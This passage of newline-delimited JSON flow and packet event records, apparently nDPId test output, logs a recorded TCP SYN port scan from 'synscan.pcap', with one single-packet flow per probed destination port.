+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ5MAADsGpd+sEAAIQA2GNIzTEWHdU4MZAAAAAGACEAAXKwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"synscan.pcap","alias":"nDPId-test","flow_id":681,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAs964AAC8GIcSsEAAIQA2GNIzTG1ndU4MZAAAAAGACEAANMwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsC84AAC0GD6WsEAAIQA2GNIzTJ8TdU4MZAAAAAGACCAAIyAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsHuYAADAG+YysEAAIQA2GNIzTDwvdU4MZAAAAAGACBAAlgQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"synscan.pcap","alias":"nDPId-test","flow_id":684,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsD7cAADgGALysEAAIQA2GNIzTG7zdU4MZAAAAAGACBAAY0AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"synscan.pcap","alias":"nDPId-test","flow_id":685,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAspxIAAC0GdGCsEAAIQA2GNIzSBMLdUoMYAAAAAGACCAArzQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059565,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"synscan.pcap","alias":"nDPId-test","flow_id":686,"flow_packet_id":1,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059565,"pkt":"ACYLMQczACWzv5HuCABFAAAsBn4AACYGG\/WsEAAIQA2GNIzSS3PdUoMYAAAAAGACDADhGwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"synscan.pcap","alias":"nDPId-test","flow_id":687,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAs43YAACwGOPysEAAIQA2GNIzSTYLdUoMYAAAAAGACBADnDAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"synscan.pcap","alias":"nDPId-test","flow_id":688,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsg1oAAC4GlxisEAAIQA2GNIzSDdrdUoMYAAAAAGACDAAetQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsI3IAAC4G9wCsEAAIQA2GNIzSBD7dUoMYAAAAAGACDAAoUQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAstG0AADoGWgWsEAAIQA2GNIzSBBzdUoMYAAAAAGACDAAocwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"synscan.pcap","alias":"nDPId-test","flow_id":691,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAssh8AAC8GZ1OsEAAIQA2GNIzSD5vdUoMYAAAAAGACEAAY9AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"synscan.pcap","alias":"nDPId-test","flow_id":692,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsqVsAACsGdBesEAAIQA2GNIzSEyTdUoMYAAAAAGACEAAVawAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAshXIAADcGjACsEAAIQA2GNIzSdTDdUoMYAAAAAGACEACzXgAAAgQFtA=="} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"synscan.pcap","alias":"nDPId-test","flow_id":694,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsTHsAACYG1fesEAAIQA2GNIzSACrdUoMYAAAAAGACDAAsZQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"synscan.pcap","alias":"nDPId-test","flow_id":695,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAscHUAADUGov2sEAAIQA2GNIzSySXdUoMYAAAAAGACCABnaQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":705,"source":"synscan.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsCSMAADAGD1CsEAAIQA2GNIzSIADdUoMYAAAAAGACBAAUjwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":706,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAsZzsAACsGtjesEAAIQA2GNIzSBPfdUoMYAAAAAGACEAAjmAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059566,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_packet_id":1,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059566,"pkt":"ACYLMQczACWzv5HuCABFAAAs970AADoGFrWsEAAIQA2GNIzSPpDdUoMYAAAAAGACDADt\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs+JEAADEGHuGsEAAIQA2GNIzTGZPdU4MZAAAAAGACCAAW+QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2048,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":700,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAs65oAACYGNtisEAAIQA2GNIzTCADdU4MZAAAAAGACDAAkjAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":701,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsOSQAACcG6E6sEAAIQA2GNIzTBAfdU4MZAAAAAGACEAAkhQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsMb0AADYG4LWsEAAIQA2GNIzTC9bdU4MZAAAAAGACDAAgtgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":703,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsLlAAAC0G7SKsEAAIQA2GNIzTH6PdU4MZAAAAAGACCAAQ6QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059625,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":704,"flow_packet_id":1,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059625,"pkt":"ACYLMQczACWzv5HuCABFAAAsDQ4AADEGCmWsEAAIQA2GNIzTH0LdU4MZAAAAAGACCAARSgAAAgQFtA=="} 